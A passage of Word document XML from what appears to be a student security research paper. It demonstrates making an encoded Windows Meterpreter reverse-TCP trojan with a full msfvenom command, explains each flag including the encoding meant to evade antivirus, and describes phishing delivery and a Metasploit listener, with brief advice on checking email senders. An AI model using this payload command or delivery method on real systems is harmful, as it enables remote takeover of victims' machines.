        <w:t xml:space="preserve">either  a </w:t>
      </w:r>
      <w:r>
        <w:t>hyperlink to what they think is a legitimate website they would like to visit</w:t>
      </w:r>
      <w:r w:rsidR="00BC6F1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>but instead the hyperlink will redirect them to an ‘Apache2’ web</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>server that was utilised within the SET attack to download and install the malware within the clients device so that the attacker can gain access to their secured device remotel</w:t>
      </w:r>
      <w:r w:rsidR="00BC6F1A">
        <w:t>y or a phishing E-Mail could contain</w:t>
      </w:r>
      <w:r w:rsidR="00BC6F1A" w:rsidRPr="00BC6F1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC6F1A">
        <w:t xml:space="preserve">an attached legitimate </w:t>
      </w:r>
      <w:r w:rsidR="00302ADF">
        <w:t>web link</w:t>
      </w:r>
      <w:r w:rsidR="00BC6F1A">
        <w:t xml:space="preserve"> that once opened </w:t>
      </w:r>
      <w:r w:rsidR="00302ADF">
        <w:t xml:space="preserve">download </w:t>
      </w:r>
      <w:r w:rsidR="00BC6F1A">
        <w:t xml:space="preserve">run the trojan backdoor executable file in the background </w:t>
      </w:r>
      <w:r w:rsidR="00302ADF">
        <w:t>so that the attacker can remotely access the victims device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090849B1" w14:textId="1DFFAE4B" w:rsidR="008B216D" w:rsidRDefault="008B216D" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0111DED7" w14:textId="3227AEBB" w:rsidR="008B216D" w:rsidRDefault="008B216D" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To demonstrate creating an undetectable ‘Trojan Horse’ backdoor piece of malware, a tool called ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ will be utilised that is part of the Metasploit framework that was previously utilised within the Eternal Blue attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B259354" w14:textId="2B91D363" w:rsidR="008B216D" w:rsidRDefault="008B216D" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14673696" w14:textId="1E50C299" w:rsidR="008B216D" w:rsidRDefault="008B216D" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To create the Trojan Horse only a single line of code needs to be inputted into the Kali Linux CLI which is; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4628C6" w14:textId="6D96F6D7" w:rsidR="005A0064" w:rsidRDefault="005A0064" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="538877D0" w14:textId="67CA5246" w:rsidR="005A0064" w:rsidRPr="00C7509A" w:rsidRDefault="00C7509A" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005A0064" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005A0064" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A0064" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A0064" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A0064" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A0064" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A0064" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A0064" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00891281" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>192.168.0.9</w:t>
      </w:r>
      <w:r w:rsidR="005A0064" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A0064" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A0064" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">=4444 -f exe </w:t>
      </w:r>
      <w:r w:rsidR="00891281" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00891281" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00891281" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00891281" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00891281" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 250 </w:t>
      </w:r>
      <w:r w:rsidR="005A0064" w:rsidRPr="00C7509A">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-o  trojan.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D32405E" w14:textId="1BDC2367" w:rsidR="00C7509A" w:rsidRDefault="00C7509A" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6746E44F" w14:textId="1B3390E7" w:rsidR="00C7509A" w:rsidRDefault="00C7509A" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>The -p flag within the code above represents the payload that will be utilised which is identical to the payload utilised within the ‘Eternal Blue’ attack. The ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>’ and ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>’ syntax are also identical to the previous ‘Eternal Blue’ attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244ABD45" w14:textId="77777777" w:rsidR="00C7509A" w:rsidRDefault="00C7509A" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B3D6EE8" w14:textId="4AADED6A" w:rsidR="003809DF" w:rsidRDefault="00C7509A" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>The -f flag represents the file extension to be added to the file, which in this case</w:t>
      </w:r>
      <w:r w:rsidR="003809DF">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> an executable file is required represented by ‘exe’</w:t>
      </w:r>
      <w:r w:rsidR="003809DF">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE5514" w14:textId="7F06ED9D" w:rsidR="003809DF" w:rsidRDefault="003809DF" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>The -e flag represents the encoder to use to disguise the true malicious nature of the file. The encoder utilised was ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>shikata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">’ encoder which is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>the most efficient encoder that utilises the metadata of a known trusted Win</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ws file such as notepad.exe and inserts it within the malware, the more times the file is encoded the more disguised it becomes but this also adds size to the malware the -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag was utilised to iterate the encoded file 250 times which resulted in a 75 Kilobyte file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BDFB91" w14:textId="77777777" w:rsidR="003809DF" w:rsidRDefault="003809DF" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4514550F" w14:textId="68D1DBA9" w:rsidR="003809DF" w:rsidRDefault="003809DF" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The -o flag was utilised to name the file and tell </w:t>
      </w:r>
      <w:r w:rsidR="00D84490">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D84490">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>venom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D84490">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> what directory to output the file into. By just including the name of the file the output </w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>s defaulted to the root directory within Kali Linux.</w:t>
      </w:r>
      <w:r w:rsidR="00302ADF">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The coding of the trojan can be found in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00302ADF">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>figure ??</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7BDF4E2F" w14:textId="40C75B35" w:rsidR="00302ADF" w:rsidRDefault="00302ADF" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19409634" w14:textId="46DCED4E" w:rsidR="00302ADF" w:rsidRPr="00302ADF" w:rsidRDefault="00302ADF" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B8C8AED" wp14:editId="456F85BD">
            <wp:extent cx="3195320" cy="812800"/>
            <wp:effectExtent l="0" t="0" r="5080" b="635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95320" cy="812800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EEA593" w14:textId="77777777" w:rsidR="00D84490" w:rsidRDefault="00302ADF" w:rsidP="00D84490">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F3487B" wp14:editId="6F9F24AA">
            <wp:extent cx="3196590" cy="834390"/>
            <wp:effectExtent l="0" t="0" r="3810" b="38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196590" cy="834390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D9A6A0" w14:textId="6DEAFC71" w:rsidR="00302ADF" w:rsidRDefault="00D84490" w:rsidP="00123A6D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Trojan Horse Programme Syntax Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MSvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B52CB37" w14:textId="77777777" w:rsidR="00302ADF" w:rsidRDefault="00302ADF" w:rsidP="00302ADF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF9BAB5" w14:textId="63297D97" w:rsidR="00302ADF" w:rsidRDefault="00302ADF" w:rsidP="00302ADF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The illustration and output of the encoded trojan.exe file can be found in figure </w:t>
      </w:r>
      <w:r w:rsidR="00123A6D">
        <w:t>18.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C5D73F" w14:textId="224AD2B3" w:rsidR="00FA088A" w:rsidRDefault="00FA088A" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B81EF13" w14:textId="07B6EE99" w:rsidR="00302ADF" w:rsidRDefault="00302ADF" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D0073DD" wp14:editId="05AD4C00">
            <wp:extent cx="3204210" cy="46101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04210" cy="461010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B0911B" w14:textId="77777777" w:rsidR="00123A6D" w:rsidRDefault="00302ADF" w:rsidP="00123A6D">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BF48137" wp14:editId="6455432F">
            <wp:extent cx="3204210" cy="322571"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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b="63957"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3251913" cy="327373"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B28428D" w14:textId="45D2B21F" w:rsidR="00302ADF" w:rsidRDefault="00123A6D" w:rsidP="00123A6D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Trojan Horse .EXE file created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA71ACB" w14:textId="77777777" w:rsidR="00302ADF" w:rsidRDefault="00302ADF" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3AA739" w14:textId="124D8460" w:rsidR="00BC6F1A" w:rsidRDefault="00BC6F1A" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As previously </w:t>
      </w:r>
      <w:r w:rsidR="00CB74BC">
        <w:t>discussed,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> this </w:t>
      </w:r>
      <w:r w:rsidR="00437C65">
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> could be sent to a</w:t>
      </w:r>
      <w:r w:rsidR="00CB74BC">
        <w:t xml:space="preserve"> victim </w:t>
      </w:r>
      <w:r w:rsidR="00437C65">
        <w:t xml:space="preserve">via E-Mail </w:t>
      </w:r>
      <w:r w:rsidR="00CB74BC">
        <w:t xml:space="preserve">within a business by using an internal spoofed IP address so that the victim trusts the sender so that they </w:t>
      </w:r>
      <w:r w:rsidR="00437C65">
        <w:t>click on the hyperlink</w:t>
      </w:r>
      <w:r w:rsidR="00CB74BC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC5CFE0" w14:textId="5684A2A8" w:rsidR="00CB74BC" w:rsidRDefault="00CB74BC" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3960EB83" w14:textId="1835D4E3" w:rsidR="001D0ECF" w:rsidRDefault="001D0ECF" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploit was then utilised to create a listener, to listen for the connection on port 4444 to be received from the trojan.exe file that was created. This was accomplished by utilising Metasploit’s </w:t>
      </w:r>
      <w:r w:rsidR="00437C65">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00437C65">
        <w:t>multi/handler</w:t>
      </w:r>
      <w:r w:rsidR="00437C65">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tool that was configured to listen on the LPORT of 4444 as previously discussed. The file was opened from the client machine that was within the same LAN and a Meterpreter session appeared similar to the ‘Eternal Blue’ attack where the same control was given to the attacker, this attack will work on a Windows 10 machine unlike the patched ‘Eternal Blue’ SMB </w:t>
      </w:r>
      <w:r w:rsidR="00437C65">
        <w:t>for Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C45D641" w14:textId="77777777" w:rsidR="001D0ECF" w:rsidRDefault="001D0ECF" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C3D53DC" w14:textId="05B93FD3" w:rsidR="003809DF" w:rsidRDefault="00CB74BC" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To mitigate this attack always check the email sender is what the displayed name is by clicking the name of the sender to reveal the E-Mail address. Hackers are very clever so they may use an E-Mail address that is very close to a </w:t>
      </w:r>
      <w:r w:rsidR="001D0ECF">
        <w:t>legitimate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> E-Mail address by utilising an </w:t>
      </w:r>
      <w:r w:rsidR="001D0ECF">
        <w:t>additional</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> letter or colon within the E-Mail address so if an E-Mail looks </w:t>
      </w:r>
      <w:r w:rsidR="001D0ECF">
        <w:t>suspicious</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> check the E-Mail </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>senders address and look closely to see if it is the person</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>s legitimate address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED22279" w14:textId="77777777" w:rsidR="00155398" w:rsidRPr="00213A74" w:rsidRDefault="00155398" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A71A6F6" w14:textId="3B7C8FBE" w:rsidR="00E11F62" w:rsidRDefault="003A783D" w:rsidP="00213A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E862F2">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evasion Technique Using</w:t>
      </w:r>
      <w:r w:rsidR="0043143B">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00891281">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00E862F2">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="0043143B">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000105DB">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidR="00897215">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proxy Chain Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749CB966" w14:textId="67E425B2" w:rsidR="003642DC" w:rsidRDefault="003642DC" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilising the research within the </w:t>
      </w:r>
      <w:r w:rsidRPr="003642DC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cyberwarfare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">section of this research paper, a demonstration of how hackers hide their identity and location from the security services and the police was conducted using a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>well known</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and effective evasion method called ‘Tor’ proxy chaining.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368707B0" w14:textId="753EC599" w:rsidR="003642DC" w:rsidRDefault="003642DC" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106E04B4" w14:textId="77777777" w:rsidR="00146031" w:rsidRDefault="003642DC" w:rsidP="000105DB">
